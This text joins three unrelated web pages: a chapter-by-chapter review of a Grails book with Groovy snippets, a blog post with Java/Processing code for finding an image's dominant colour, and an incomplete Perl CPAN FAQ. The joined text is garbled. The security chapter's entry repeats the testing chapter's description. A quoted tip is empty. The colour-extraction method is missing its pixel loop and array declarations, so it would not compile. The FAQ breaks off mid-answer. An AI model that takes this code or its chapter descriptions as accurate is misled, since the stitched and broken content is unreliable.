Copy web.config from your Desktop into the connectthedots website project, connectthedots\Azure\WebSite\ConnectTheDotsWebSite.
Open ConnectTheDotsWebsite solution from connectthedots\Azure\WebSite in Visual Studio.
You need to add the new web.config file to the project. Right click the solution in Solution Explorer. Choose "Add -> Existing Item..." from the menu. Navigate into ConnectTheDotsWebSite and add web.config.
Run the project in Microsoft Edge. You won't see any data until we update the sketch on the MKR1000.
The Arduino sketch needs a SAS key to access the Azure resources. Use Sandrino Di Mattia's Event Hubs Signature Generator tool to generate the key in the correct format. Download from. Unzip the tool and launch RedDog.ServiceBus.EventHubs.SignatureGenerator.
Fill in the UI using the namespace you created before. Since I used ctddc when creating the Azure resources, my namespace is ctddc-ns. The hub name is ehdevices. The publisher and sender key name should both be D1. I set the Token TTL for 1 year (525,600 minutes). The signature should be good for the life of the device.
You need to log into the Azure Portal to get the sender key. From the left menu, choose browse, and use the filter to find Event hubs.
Event hubs opens a new window in the old Azure portal.
- Click on the namespace you created.
- Choose Event Hubs
- Choose ehdevices
- Choose configure
- Scroll to the bottom and copy the primary key for D1
Switch back to the Signature Generator tool and paste the key into the Sender Key Field. Click the Generate button to generate a signature.
Copy the generated signature.
Open the MKR1000-Azure sketch in the Arduino IDE again. We need to replace the
hostname[] and
authSAS[] variables with our new event hub settings. Paste the generated signature into the
char authSAS[] field. Edit the hostname field to match your hostname. e.g.
char hostname[] = "ctddc-ns.servicebus.windows.net";
Save the sketch and upload it to your MKR1000. Optionally open the Serial Monitor and check that data is begin sent to Azure.
ALT+TAB to the connect the dots website running in Microsoft Edge and you should start seeing data from your device.
IoT Hub
Azure IoT hub is newer than Event hub and may be more appropriate for your project. IoT Hub supports device-to-cloud messaging (like this project) and cloud-to-device messaging.
Use the Azure Portal to create a new IoT Hub.
Device Explorer is used to generate signatures for accessing IoT hub. Download SetupDeviceExplorer.msi from.
Go back the the Azure Portal and open the new Iot hub. Click on the key icon, select the iothubowner row, copy the connection string for the primary key.
Open Device Explorer, paste in the connection string, click update.
Click on the Management tab. Click the create button under Actions. Enter D1 as the Device ID and click Create.
Highlight the D1 row and click the SAS Token button and generate a new token.
Open the MKR1000-Azure sketch in the Arduino IDE.
Replace the
hostname[] with your IoT hub name + ".azure-devices.net". Update
authSAS[] with the value generated with Device Explorer. Be sure to only copy the portion of the SAS Token after "SharedAcessSignature=". Adjust the URI to point to IoT hub.
char hostname[] = "hacksterdemo.azure-devices.net"; char authSAS[] = "SharedAccessSignature sr=hacksterdemo.azure-devices.net%2fdevices%2fD1&sig=jnyTV8j2%2bY9BJ9fyEdb7zu3eAVphRyul1b6BG%2fVcRhQ%3d&se=1490944761"; String deviceName = "D1"; String uri = "/devices/" + deviceName + "/messages/events?api-version=2016-02-03";
Edit the code in the sendEvent function that checks for a valid response. Event hub sends a HTTP 201 to indicate success. IoT hub sends a HTTP 204.
Change
if (response.startsWith("HTTP/1.1 201")) {
To
if (response.startsWith("HTTP/1.1 204")) {
Use the Arduino IDE to upload the sketch to your Arduino MKR1000.
Switch the Data tab in Device Explorer. Click the monitor button to view data being sent to the Event Hub.
Since this project is sending data from device-to-cloud, I'm using HTTP POST to send the data. There are also libraries for sending and receiving data with Azure IoT hub. Unfortunately, IMO they're not very Arduino-like or user friendly yet. If you want your device to receive data from Azure, the libraries might be more helpful. Alternately, check out Mohan Palanisamy's blog post about sending data from IoT hub to a MKR1000.
This post showed how to send sensor data from MRK1000 to Azure Event hubs and Iot hub. We used existing code view and graph the data. Check out the connect the dots project for more ways to write code for storing, manipulating and viewing your data with Azure.
Now that you're done, you might want to shut down or delete resources that you're not using to limit the amount of money you're charged. The AzurePrep solution has a ClearResources project to help you remove the Azure services.
Schematics
Code
Device Explorer
Connect the Dots
MKR1000-Arduino
WiFi101 Firmware Updater
Event Hubs Signature Generator
Author
Don Coleman
- 1 project
- 8 followers
Additional contributors
- Hands-on-lab particle photon weather station in azure by Paul DeCarlo
- Created connect the dots project by Connect the Dots team
- Awesome photos of mkr1000 by Ken Rimple
Published onMarch 31, 2016
Members who respect this project
you might like | https://create.arduino.cc/projecthub/doncoleman/mkr1000-temp-and-humidity-sensor-8f22ed?ref=platform&ref_id=424_trending___tutorial&offset=0 | CC-MAIN-2017-13 | refinedweb | 1,598 | 68.16 |
"
Wikipedia has a radix
tree article, but Linux radix trees are not well described by that
article. A Linux radix tree is a mechanism by which a (pointer) value can
be associated with a (long) integer key. It is reasonably efficient in terms of
storage, and is quite quick on lookups. Additionally, radix trees in the
Linux kernel have some features driven by kernel-specific needs, including
the ability to associate tags with specific entries.
The cheesy diagram on the right shows a leaf node from a Linux radix tree.
The node contains a number of slots, each of which can contain a pointer to
something of interest to the creator of the tree. Empty slots contain a
NULL pointer. These trees are quite broad - in the 2.6.16-rc
kernels, there are 64 slots in each radix tree node. Slots are indexed by
a portion of the (long) integer key. If the highest key value is less than
64, the entire tree can be represented with a single node.
Normally, however, a rather larger set of keys is in use - otherwise, a
simple array could have been used. So a larger tree might look something
like this:
This tree is three levels deep. When the kernel goes to look up a specific
key, the most significant six bits will be used to find the appropriate
slot in the root node. The next six bits then index the slot in the middle
node, and the least significant six bits will indicate the slot containing a
pointer to the actual value. Nodes which have no children are not present
in the tree, so a radix tree can provide efficient storage for sparse
trees.
Radix trees have a few users in the mainline kernel tree. The PowerPC
architecture uses a tree to map between real and virtual IRQ numbers. The
NFS code attaches a tree to relevant inode structures to keep
track of outstanding requests. The most widespread use of radix trees,
however, is in the memory management code. The address_space
structure used to keep track of backing store contains a radix tree which
tracks in-core pages tied to that mapping. Among other things, this tree
allows the memory management code to quickly find pages which are dirty or
under writeback.
As is typical with kernel data structures, there are two modes for
declaring and initializing radix trees:
#include <linux/radix-tree.h>
RADIX_TREE(name, gfp_mask); /* Declare and initialize */
struct radix_tree_root my_tree;
INIT_RADIX_TREE(my_tree, gfp_mask);
The first form declares and initializes a radix tree with the given
name; the second form performs the initialization at run time. In
either case, a gfp_mask must be provided to tell the code how
memory allocations are to be performed. If radix tree operations
(insertions, in particular) are to be performed in atomic context, the
given mask should be GFP_ATOMIC.
The functions for adding and removing entries are straightforward:
int radix_tree_insert(struct radix_tree_root *tree, unsigned long key,
void *item);
void *radix_tree_delete(struct radix_tree_root *tree, unsigned long key);
A call to radix_tree_insert() will cause the given item
to be inserted (associated with key) in the given tree. This
operation may require memory allocations; should an allocation fail, the
insertion will fail and the return value will be -ENOMEM. The
code will refuse to overwrite an existing entry; if key already
exists in the tree, radix_tree_insert() will return
-EEXIST. On success, the return value is zero.
radix_tree_delete() removes the item associated with key
from tree, returning a pointer to that item if it was present.
There are situations where failure to insert an item into a radix tree can
be a significant problem. To help avoid such situations, a pair of specialized
functions are provided:
int radix_tree_preload(gfp_t gfp_mask);
void radix_tree_preload_end(void);
This function will attempt to allocate sufficient memory (using the given
gfp_mask) to guarantee that the next radix tree insertion cannot
fail. The allocated structures are stored in a per-CPU variable, meaning
that the calling function must perform the insertion before it can schedule
or be moved to a different processor. To that end,
radix_tree_preload() will, when successful, return with preemption
disabled; the caller must eventually ensure that preemption is enabled
again by calling radix_tree_preload_end(). On failure,
-ENOMEM is returned and preemption is not disabled.
Radix tree lookups can be done in a few ways:
void *radix_tree_lookup(struct radix_tree_root *tree, unsigned long key);
void **radix_tree_lookup_slot(struct radix_tree_root *tree, unsigned long key);
unsigned int radix_tree_gang_lookup(struct radix_tree_root *root,
void **results,
unsigned long first_index,
unsigned int max_items);
The simplest form, radix_tree_lookup(), looks for key in
the tree and returns the associated item (or NULL on
failure). radix_tree_lookup_slot() will, instead, return a
pointer to the slot holding the pointer to the item. The caller can, then,
change the pointer to associate a new item with the key. If the
item does not exist, however, radix_tree_lookup_slot() will not
create a slot for it, so this function cannot be used in place of
radix_tree_insert().
Finally, a call to radix_tree_gang_lookup() will return up to
max_items items in results, with ascending key values
starting at first_index. The number of items returned may be less
than requested, but a short return (other than zero) does not imply that
there are no more values in the tree.
One should note that none of the radix tree
functions perform any sort of locking internally. It is up to the caller
to ensure that multiple threads do not corrupt the tree or get into other
sorts of unpleasant race conditions. Nick Piggin currently has a patch
circulating which would use read-copy-update to free tree nodes; this patch
would allow lookup operations to be performed without locking as long as
(1) the resulting pointer is only used in atomic context, and
(2) the calling code avoids creating race conditions of its own. It
is not clear when that patch might be merged, however.
The radix tree code supports a feature called "tags," wherein specific bits
can be set on items in the tree. Tags are used, for example, to mark
memory pages which are dirty or under writeback. The API for working with
tags is:
void *radix_tree_tag_set(struct radix_tree_root *tree,
unsigned long key, int tag);
void *radix_tree_tag_clear(struct radix_tree_root *tree,
unsigned long key, int tag);
int radix_tree_tag_get(struct radix_tree_root *tree,
unsigned long key, int tag);
radix_tree_tag_set() will set the given tag on the item
indexed by key; it is an error to attempt to set a tag on a
nonexistent key. The return value will be a pointer to the tagged item.
While tag looks like an arbitrary integer, the
code as currently written allows for a maximum of two tags. Use of any tag
value other than zero or one will silently corrupt memory in some
undesirable place; consider yourself warned.
Tags can be removed with radix_tree_tag_clear(); once again, the
return value is a pointer to the (un)tagged item. The function
radix_tree_tag_get() will check whether the item indexed by
key has the given tag set; the return value is zero if
key is not present, -1 if key is present but tag
is not set, and +1 otherwise. This function is currently commented out in
the source, however, since no in-tree code uses it.
There are two other functions for querying tags:
int radix_tree_tagged(struct radix_tree_root *tree, int tag);
unsigned int radix_tree_gang_lookup_tag(struct radix_tree_root *tree,
void **results,
unsigned long first_index,
unsigned int max_items,
int tag);
radix_tree_tagged() returns a non-zero value if any item in the
tree bears the given tag. A list of items with a given tag can be
obtained with radix_tree_gang_lookup_tag().
In concluding, we can note one other interesting aspect of the radix tree
API: there is no function for destroying a radix tree. It is, evidently,
assumed that radix trees will last forever. In practice, deleting all
items from a radix tree will free all memory associated with it other than
the root node, which can then be disposed of normally.
Node size and cache-line ping pong on SMP
Posted Mar 17, 2006 21:27 UTC (Fri) by im14u2c (subscriber, #5246)
[Link]
Trees I: Radix trees
Posted Mar 19, 2006 8:09 UTC (Sun) by ncm (subscriber, #165)
[Link]
Posted Jun 30, 2006 23:22 UTC (Fri) by wahern (subscriber, #37304)
[Link]
Source:
Simplicity is often a very valuable quality, especially in software development.
Judy licensing
Posted Jul 18, 2007 7:59 UTC (Wed) by iler (guest, #46313)
[Link]
Is Judy GPLed ?
Posted Oct 23, 2008 21:31 UTC (Thu) by bcl (guest, #17631)
[Link]
Linux is a registered trademark of Linus Torvalds | http://lwn.net/Articles/175432/ | crawl-002 | refinedweb | 1,428 | 65.96 |
On 09/11/2017 03:28 PM, Guido van Rossum wrote: > Oddly I don't like the enum (flag names get too long that way), but I do agree with everything else Barry said (it > should be a trivalue flag and please don't name it cmp). Hmmm, named constants are one of the motivating factors for having an Enum type. It's easy to keep the name a reasonable length, however: export them into the module-level namespace. re is an excellent example; the existing flags were moved into a FlagEnum, and then (for backwards compatibility) aliased back to the module level: class RegexFlag(enum.IntFlag): ASCII = sre_compile.SRE_FLAG_ASCII # assume ascii "locale" IGNORECASE = sre_compile.SRE_FLAG_IGNORECASE # ignore case LOCALE = sre_compile.SRE_FLAG_LOCALE # assume current 8-bit locale UNICODE = sre_compile.SRE_FLAG_UNICODE # assume unicode "locale" MULTILINE = sre_compile.SRE_FLAG_MULTILINE # make anchors look for newline DOTALL = sre_compile.SRE_FLAG_DOTALL # make dot match newline VERBOSE = sre_compile.SRE_FLAG_VERBOSE # ignore whitespace and comments A = ASCII I = IGNORECASE L = LOCALE U = UNICODE M = MULTILINE S = DOTALL X = VERBOSE # sre extensions (experimental, don't rely on these) TEMPLATE = sre_compile.SRE_FLAG_TEMPLATE # disable backtracking T = TEMPLATE DEBUG = sre_compile.SRE_FLAG_DEBUG # dump pattern after compilation globals().update(RegexFlag.__members__) So we can still do re.I instead of re.RegexFlag.I. Likewise, if we had: class Compare(enum.Enum): NONE = 'each instance is an island' EQUAL = 'instances can be equal to each other' ORDERED = 'instances can be ordered and/or equal' globals().update(Compare.__members__) then we can still use, for example, EQUAL, but get the more informative repr and str when we need to. -- ~Ethan~ | https://mail.python.org/pipermail/python-dev/2017-September/149604.html | CC-MAIN-2020-16 | refinedweb | 261 | 50.73 |
Hello,
Normally I work/play with microcontrollers from Microchip, but for my thesis I have to use Arduino, so we got ourselves an Arduino board MEGA 2560 in school.
Easy peasy I thought, download the software, plug the board in through a USB cable, the green light lits so I figure it's working. THEN after even less than a second, the chip gets EXTREMELY HOT! (Nothing is even plugged in yet, so no huge currents drawn)
Hi,
My question is if it is possible to estimate or calculate the time a µcontroller needs in order to execute a few commands. I'm trying to get exactly 1 second that a whole series of commands take, something like this (programmed in C):
while(j<time){
//several commands..
}.
Hello!
So I've made a topic in the MPLAB section, but no one seemed to answer, so I thought, maybe it belongs in here, since I'm pretty newb at the moment.
Situation:
I bought a PCKit2 and looked at the 12 examples, they're pretty neat. But I would like to learn to program the PIC's in C-language.
I have found a guide on the MPLAB CD-ROM that came with this PICKit2, but it doesn't seem to work.
Then I've tried a tutorial on the internet, and here's what that gave me:
I've just made a source file with just a small main like this (using a PIC16F690):
So I've got myself this PICKit2 and looked at the 12 examples in the guide, but I'm wondering how to program in C instead of assembler language, because of having more experience with C-like language than with assembler language.
I've found a tutorial on the internet, but it's from an older version of MPLAB, so I can't follow too much with the settings being different.
#include <p16F690.h>void main(){}
So I've tried making an alarm clock robot from the LMR First Robot, and it works kind off, so I'll try to make it look more sophisticated. Now it just looks like a speaker and batteries on a plate with some wires, here's what I'm thinking of doing with it (don't think thats proper english, hmm):
So it'll have 2 wheels+electromotor, 1 on each side, a 7-LED Display, 4 buttons to adjust the timer, and 1 to shut off the alarm. The frame should be transparent, so I can put some blue LED's in it.
So I'm trying to adapt my robot to make a wake up robot, that makes an alarm, and as soon as the alarm starts, he starts driving so u have to get up to shut him off.
Search page | http://letsmakerobots.com/user/18940/pages | CC-MAIN-2014-10 | refinedweb | 464 | 67.72 |
The for loop executes a given code block multiple times. It simplifies the loop process when we need to repeat the body a fixed number of times. It handles the iterations, using three statements: initialization ; condition ; update.
As you see, “for” is a pre-condition loop. The first thing that is executed in a for loop is the initialization statement. Then the condition is checked and if it is true the body is executed. After the body follows the update statement and then the condition.
The iterations continue until the condition is evaluated to false. We can represent the logic like this:
Initialization – (Condition – Body – Update)
The statements in the parenthesis will execute for each repetition of the loop.
for(initialization
; condition ; update)
{
Body of the loop
}
Note that all of these statements (excluding the body) are optional. If you choose to omit some of them, you still need to add the semicolon. In fact, one common way to write an infinite loop in C is:
for(;;)
{
}
This is the first part that is executed. It is executed only once. Usually here, we will initialize an int variable.
for (i = 0 ; …)
We can initialize more than one variable, separating them with commas.
for (i = 0, j = 1 ; …)
Note that the variables i and j were created before the loop. Before the C99 standard, it was not allowed to create a variable at this place. If your compiler complies with C99 or later, you can create and initialize the variable in the loop like this:
for(int i = 1; ...)
When you create a variable in this manner, its scope is limited to the for loop – its initialization, condition, update and body. Once the program leaves the loop that variable is out of scope and you cannot access it anymore.
The condition statement executes with each iteration, just before the body block. In theory, you can place here any statement that returns any result. In practice here we compare our counting variable to the target number of executions.
for(...; i < 10; ...)
If you omit the condition, it is always evaluated to true.
The update statement executes with each iteration, right after the body block. In theory here you can put any valid C statement. Normally, we just increment or decrement our counter variable(s).
for(...; ...; i++)
We can also increment by a different step, by a factor or even use an entire expression.
The classic use:
#include <stdio.h>
int main()
{
int i;
for(i = 1; i <= 10; i++)
{
printf("%d ", i);
}
}
This simple example will print the numbers from 1 to 10. The actual output of the program is:
“1 2 3 4 5 6 7 8 9 10”
Different increment step:
Write a function that sums all even numbers between 9 and 31. In this case we don’t need to iterate over the odd numbers. That’s why we use an increment step of 2, starting from the first even number in the interval:
int sumEvens()
{
int i = 10;
int sum = 0;
for(; i < 31; i = i + 2)
{
sum += i;
}
return sum;
}
A decrementing counter:
Create a program in C that reads a sequence of numbers and finds the biggest of them. The first input tells how many numbers we need to read and compare. Use a for loop.
void findMax()
{
int count, i, currentNumber, max;
printf("How many numbers do you want to compare? ");
scanf("%d", &count);
scanf("%d", &max);
for(i = count; i > 1; i--)
{
scanf("%d", &currentNumber);
if(currentNumber > max)
max = currentNumber;
}
printf("The biggest number is %d\n", max);
}
Introduction
AllegroGraph supports creating free text indices using Apache Solr, which we describe in this document.
Note that freetext indexing is orthogonal to triple indices like spogi. Freetext indices let you quickly map from words and phrases to triples; triple indices let you quickly find triples that match particular patterns.
Other free text indexers in AllegroGraph
There is also a native free text indexer, described in Free Text Indices.
Text indexing with Apache Solr
Apache Solr is an open-source freetext indexing/searching platform from the Apache Lucene project. Lucene is a Java-based freetext indexer with a great many features. Solr is an XML database wrapper around Lucene.
Apache Solr is described on the following website: lucene.apache.org/solr/.
Should you use the Solr indexer or the native AllegroGraph text indexer?
The native free text indexer, described (as said above) in Free Text Indices, is sufficient for many purposes and has these advantages:
It is generally faster.
It has a simpler API (Solr runs as a separate program which must communicate with AllegroGraph).
You must keep Solr and AllegroGraph in sync. That is automatic with the native indexer.
But because Solr is a public project with many users and many contributors, it has many features which are not in the AllegroGraph native free text indexer. Further, it is constantly being enhanced.
Solr supports:
Many languages
Very flexible pipe line architecture for tokenizers, stemmers, etc.
External file-based configuration of stopword lists, synonym lists, and protected word lists
Relevancy ranking and word boosting *
Finding words close together *
Faceted Search *
Text clustering *
Hit highlighting *
The bullets marked with stars are Solr features not in the native free text indexer.
Installing Apache Solr
Because it is a separate application, AllegroGraph itself does not start the Apache Solr application.
Further, the application itself is not part of the AllegroGraph distribution.
Before using Solr to create indices and do searches, please download and install Solr (which again, is not a Franz Inc. product) as described on the Apache Solr website.
In the rest of this document, we assume you have the Solr server installed and running on your computer.
Important notes on running Solr with AllegroGraph
Please note the following:
The Solr database needs to be populated. Adding triples to a triple store does not automatically add records to Solr, nor does deleting triples delete records from Solr.
The Solr database needs to have a field that contains an integer document id. You may use triple ids for it, or you may use your own numbering, and insert (subject !<> document-id) into the triple store to establish the association of the document id with the subject. The document-id must be of type xsd:long.
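Following the pattern used in the solr-example.cl listing later in this document (its fi:solrDocId predicate), establishing that association can be sketched in Lisp like this:

```lisp
;; Sketch only: assumes the "fi" namespace is registered as in
;; solr-example.cl, and that the !-reader is enabled.
(let ((id (add-triple subject predicate object)))
  ;; Associate the Solr document id with the subject, typed as xsd:long
  (add-triple subject !fi:solrDocId (value->upi id :long)))
```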
Settings for Solr
Two database metadata values have been added to keep the information needed to connect to the Solr server:
solr-endpoint : the URL of the solr server.
solr-id-field : the name of the solr field that contains docid.
These can be set and retrieved with the following Lisp functions:
Returns the current Solr connection parameters in a plist.
Currently it contains two items:
- :endpoint to specify Solr server endpoint.
- :id-field to specify the Solr field name that contains document id.
set-solr-parameters: Set Solr connection parameters.
You can set either :endpoint or :id-field, or both.
These parameters can also be set in AGWebView.
Solr usage
There are two new prolog functions:
- solrid ?id ?query [?howmany]
Search the Solr database with ?query, and unify the docid to ?id. ?howmany limits the max number of matches; its default is 100. The query is parsed by the Solr server, so you can use the syntax supported by it. Multiple words are regarded as an OR search (by default---it depends on the Solr server config). The keyword AND can be used for an 'and' condition, and parentheses can be used for grouping. See the Solr documentation for more details.
- solr-text ?s ?query [?howmany]
After obtaining Solr doc ids (as solrid does), this unifies ?s with the subjects associated with those ids, as if by (q ?s !<> ?id).
The following Lisp function is exported from the db.agraph.query.solr package:
- get-ids-from-solr-query (query &optional (howmany 100))
Issue QUERY to the external Solr server, retrieve the document ids and return them as a list of integers. Solr connection parameters need to be set up by set-solr-parameters before calling this function.
Solr example
Here is a simple example. It is difficult to anticipate all the ways the Solr interface will be used, and the setup can differ quite a lot depending on what the application wants to index. There is great flexibility in setting up the Solr schema, and what counts as a valid Solr query depends on how the schema is set up.
The Solr schema defines what kind of information is stored for each document. AllegroGraph requires that the schema at least contain a field which contains a unique number to identify the document.
Download the latest version of Solr if you have not already done so. We assume the variable $SOLR is the directory into which the Solr distribution was extracted.
- Open $SOLR/example/solr/conf/schema.xml with an editor. Find the <fields> element and replace its body with the following field elements:

<field name="id" type="string" indexed="true" stored="true" required="true" />
<field name="predicate" type="string" indexed="true" stored="true"/>
<field name="text" type="text_general" indexed="true" stored="true"/>

In this case, the 'id' field serves to identify the document. We'll also index the predicate part as the 'predicate' field, and both the object and the subject parts as 'text' fields. It is also necessary to comment out the copyField elements.

- In the $SOLR/example directory, run the Solr server:

java -Djetty.port=8983 -jar start.jar

The jetty.port parameter specifies the TCP port number on which the Solr server will listen. If you need to run multiple Solr servers on one machine, choose different port numbers for each. (Solr can only have a single repository per server, so you need multiple servers if you want to serve more than one repository.) This command runs the server in the foreground, with tons of debugging messages to stdout. You may want to redirect its output elsewhere and/or put the java process in the background, e.g.

(java -Djetty.port=8983 -jar start.jar > /dev/null 2>&1)&

For further customization of the Solr server, please consult the Solr documentation.

- From AGWebView, go to a repository page. At the bottom of the "Store Control" list you will find a link "Manage external Solr free-text indexer". Clicking it brings you to the "External Solr free-text indexer setting" screen. Type "" in the "Solr endpoint url" box, adjusting the port number to match the number you used for the jetty.port parameter when you started the Solr server. The "Document id field name" box specifies the Solr field name to be used as the unique document ID. We set it up as "id" in the schema above, so you can leave it as "id". Click the "Set" button to save the settings.
Now you can query Solr from AllegroGraph's prolog or Lisp interface. However, in the beginning, the Solr database is empty. You need to populate it.
AllegroGraph does not handle insert/update/delete operations on the Solr database, since it needs a separate commit from AllegroGraph's own commit. You can use Solr's REST HTTP API, or one of their language bindings, to populate the Solr database. The AllegroGraph Lisp client also has a Solr binding. The Lisp code solr-example.cl, below, shows one way to insert data into Solr as well as adding triples to AllegroGraph.
Once the Solr database is populated, you can issue a prolog query using solrid/2. For example, the following query returns a list of characters whose line contains "good".
(select (?s) (solrid ?id "good") (q ?s !<> ?id))
(You can also use the predicate
solr-text. It essentially combines both clauses into one, so
(select (?s) (solr-text ?s "good")) has the same effect as the query above.)
By default, space-separated words in a Solr query means OR. So the following query returns the doc ids that contain either "good" or "him" or both in their indexed parts:
(select (?id) (solrid ?id "good him"))
while the following returns only the doc ids whose indexed parts contain both "good" and "him":
(select (?id) (solrid ?id "good AND him"))
Please consult the Solr documentation for advanced queries. The solrid and solr-text functions pass the query string to Solr as-is, and it's up to the Solr engine to interpret it. There is great flexibility on the Solr side to customize how the query string should be parsed.
solr-example.cl
In many browsers, the long lines will look truncated but the text will cut and paste correctly.
;; -*-mode:common-lisp, package:db.agraph.user-*- (in-package :db.agraph.user) (eval-when (compile load eval) (enable-!-reader)) (register-namespace "names" "") (register-namespace "actions" "") (register-namespace "fi" "") (defvar *solr-endpoint* "") (defvar *solr-test-data* '(("Master" "Boatswain!") ;1 ("Boatswain" "Here, master: what cheer?") ;3 ("Master" "Good, speak to the mariners: fall to't, yarely,or we run ourselves aground: bestir, bestir.") ;5 ("Boatswain" "Heigh, my hearts! cheerly, cheerly, my hearts! yare, yare! Take in the topsail. Tend to the master's whistle. Blow, till thou burst thy wind, if room enough!") ;7 ("ALONSO" "Good boatswain, have care. Where's the master? Play the men.") ;9 ("Boatswain" "I pray now, keep below.") ;11 ("ANTONIO" "Where is the master, boatswain?") ;13 ("Boatswain" "Do you not hear him? You mar our labour: keep your cabins: you do assist the storm.") ;15 ("GONZALO" "Nay, good, be patient.") ;17 ("Boatswain" "When the sea is. Hence! What cares these roarers for the name of king? To cabin: silence! trouble us not.") ;19 ("GONZALO" "Good, yet remember whom thou hast aboard.") ;21 (.") ;23 (.") ;25 ("Boatswain" "Down with the topmast! yare! lower, lower! Bring her to try with main-course. A cry within A plague upon this howling! they are louder than the weather or our office.") ;27 ("Boatswain" "Yet again! what do you here? Shall we give o'er and drown? Have you a mind to sink?") ;29 ("SEBASTIAN" "A pox o' your throat, you bawling, blasphemous, incharitable dog!") ;31 ("Boatswain" "Work you then.") ;33 ("ANTONIO" "Hang, cur! hang, you whoreson, insolent noisemaker! We are less afraid to be drowned than thou art.") ;35 ("GONZALO" "I'll warrant him for drowning; though the ship were no stronger than a nutshell and as leaky as a sieve.") ;37 ("Boatswain" "Lay her a-hold, a-hold! set her two courses off to sea again; lay her off.") ;39 ("Mariners" "All lost! to prayers, to prayers! 
all lost!") ;41 ("Boatswain" "What, must our mouths be cold?") ;43 ("GONZALO" "The king and prince at prayers! let's assist them,For our case is as theirs.") ;45 ("SEBASTIAN" "I'm out of patience.") ;47 ("ANTONIO" "We are merely cheated of our lives by drunkards: This wide-chapp'd rascal--would thou mightst lie drowning The washing of ten tides!") ;49 ("GONZALO" "He'll be hang'd yet,Though every drop of water swear against it And gape at widest to glut him.") ;51 ("ANTONIO" "Let's all sink with the king.") ;53 ("SEBASTIAN" "Let's take leave of him.") ;55 ("GONZALO" "Now would I give a thousand furlongs of sea for an acre of barren ground, long heath, brown furze, any thing. The wills above be done! but I would fain die a dry death."))) (defun add-test-data () (let ((solr (make-instance 'solr:solr :uri *solr-endpoint*))) (labels ((insert (s p o) (let ((id (add-triple (resource s "names") (resource p "actions") (literal o)))) (format t "Adding #~a~%" id) (add-triple (resource s "names") !fi:solrDocId (value->upi id :long)) (solr:solr-add solr `((:id . ,(write-to-string id)) (:predicate . ,p) (:text . ,o)))))) (loop for (s o) in *solr-test-data* do (insert s "says" o)) (commit-triple-store) (solr:solr-commit solr)) (format t "Added ~s records~%" (length *solr-test-data*)))) ;; execute these two forms to run the example: ;;(create-triple-store "solr-example") ;;(add-test-data)
Solr and SPARQL 1.1
Assuming that you have setup Apache Solr with an AllegroGraph triple-store, you can query it using the SPARQL 1.1 query engine.
There are two storage strategies. In the first, you add a triple that associates the text with a Solr document ID. For example, if you have a triple like
-subject- somePredicate "Text you want to index" .
Then you would add a triple like:
-subject- <> -ID- .
And tell Solr to associate the text of the first triple with the ID of the second.
The second strategy is applicable for clients that have access to the triple-id. Here, you tell Solr to associate the text with the triple-id directly.
To query Solr with SPARQL, you use one of the new magic predicates:
- <>
- <>
The first predicate corresponds to the indirect storage strategy; the second to the triple-id based strategy. Queries for each storage strategy are similar:
# indirect strategy
prefix solr: <>
prefix franz: <>
select * {
  ?s solr:match 'medicate disastrous' .
  ?s franz:text ?text .
  ?s otherProperty ?other .
}

# triple-id strategy
prefix solr: <>
select * {
  ?s solr:matchId 'medicate disastrous' .
  ?s otherProperty ?other .
}
Note that Solr queries can return many results which can cause excessive query delays. You can use the query option
solrQueryLimit to limit the number of results Solr returns. This defaults to 100 but if we wanted to only get 10 results, we could write:
prefix franzOption_solrQueryLimit: <franz:10>
prefix solr: <>
prefix franz: <>
select * {
  ?s solr:match 'medicate disastrous' .
  ?s franz:text ?text .
  ?s otherProperty ?other .
}
Solr and Allegro CL
Allegro CL has an interface to Solr. This interface is built into AllegroGraph. It is not part of the regular Allegro CL product but is available on the Franz Inc. Github site at. You might wish to download the Allegro CL Solr Interface documentation from that location. That documentation is not included in the AllegroGraph documentation set and is not strictly necessary to create Solr free text indices in AllegroGraph, but it might be useful for other purposes.
This is a very simple C++ console application that creates a simple OpenGL window. The source code is from the book "OpenGL Programming Guide (Third Edition)." This article will explain how to download and include the GLUT library. Once you include the GLUT library, it's very simple to build and execute the code. It explains also the OpenGL code that is used in this program.
You should be able to use Visual Studio 2005 and C++. You should also have some idea about OpenGL.
Steps:
Before you even start a new project, you have to download the GLUT library. You can get the latest version from this link: GLUT 3.7.6 for Windows. Click this (glut-3.7.6-bin.zip (117 KB) ) link and download the ZIP file into your computer.
Unzip the folder, copy the glut32.dll file and paste it to C:\WINDOWS\system. Copy the glut32.lib file and paste it to this directory: C:\Program Files\Microsoft Visual Studio 8\VC\PlatformSDK\Lib. The last step is to copy the glut.h file and paste it to this directory: C:\Program Files\Microsoft Visual Studio 8\VC\PlatformSDK\Include\gl. The installation of the GLUT library files is done. However, if you are using a different version of Windows or Visual Studio, the directories might be different. I'm assuming that you are using Windows Vista and Visual Studio 2005.
Create a C++ console application. You don't need a Windows application. From Visual Studio 2005, select File -> New -> Projects. Select project types Visual C++ -> Win32 and create a Win32 console application.
Type the code, build and execute. Make sure to include <GL/glut.h>.
//Include files
#include "stdafx.h"
#include <GL/glut.h>
Function display(void) displays a polygon. The body of this listing got lost above; it follows the classic hello.c example from the "OpenGL Programming Guide" that this article is based on:

void display(void)
{
    //clear all pixels
    glClear(GL_COLOR_BUFFER_BIT);

    //draw a white polygon (rectangle)
    glColor3f(1.0, 1.0, 1.0);
    glBegin(GL_POLYGON);
        glVertex3f(0.25, 0.25, 0.0);
        glVertex3f(0.75, 0.25, 0.0);
        glVertex3f(0.75, 0.75, 0.0);
        glVertex3f(0.25, 0.75, 0.0);
    glEnd();

    //start processing buffered OpenGL routines
    glFlush();
}
Function init() initialises GLUT (sets the state):
void init(void)
{
//select clearing (background) color
glClearColor(0.0, 0.0, 0.0, 0.0);
//initialize viewing values
glMatrixMode(GL_PROJECTION);
glLoadIdentity();
glOrtho(0.0, 1.0, 0.0, 1.0, -1.0, 1.0);
}
Main function: make sure to change the command-line parameter _TCHAR* to char**.
int _tmain(int argc, char** argv)
{
//Initialise GLUT with command-line parameters.
glutInit(&argc, argv);
//Set Display Mode
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB);
//Set the window size
glutInitWindowSize(250,250);
//Set the window position
glutInitWindowPosition(100,100);
//Create the window
glutCreateWindow("A Simple OpenGL Windows Application with GLUT");
//Call init (initialise GLUT
init();
//Call "display" function
glutDisplayFunc(display);
//Enter the GLUT event loop
glutMainLoop();
return 0;
}
Actually, this is a very simple OpenGL program. However, if you are new and don't know how to initialise the GLUT library, it might take a little more time to get the code to compile.
Uploaded on 01/29.
Book Review: Grails in Action
ISBN: 1933988932
Review
Part 1: Introducing Grails
- "Chapter 1: Grails in a hurry...":
You learn what the big ideas in Grails are: convention over configuration, agile philosophy, rock-solid foundation, scaffolding and templating, Java integration, incredible wetware, and productivity ethos.
Highlights:
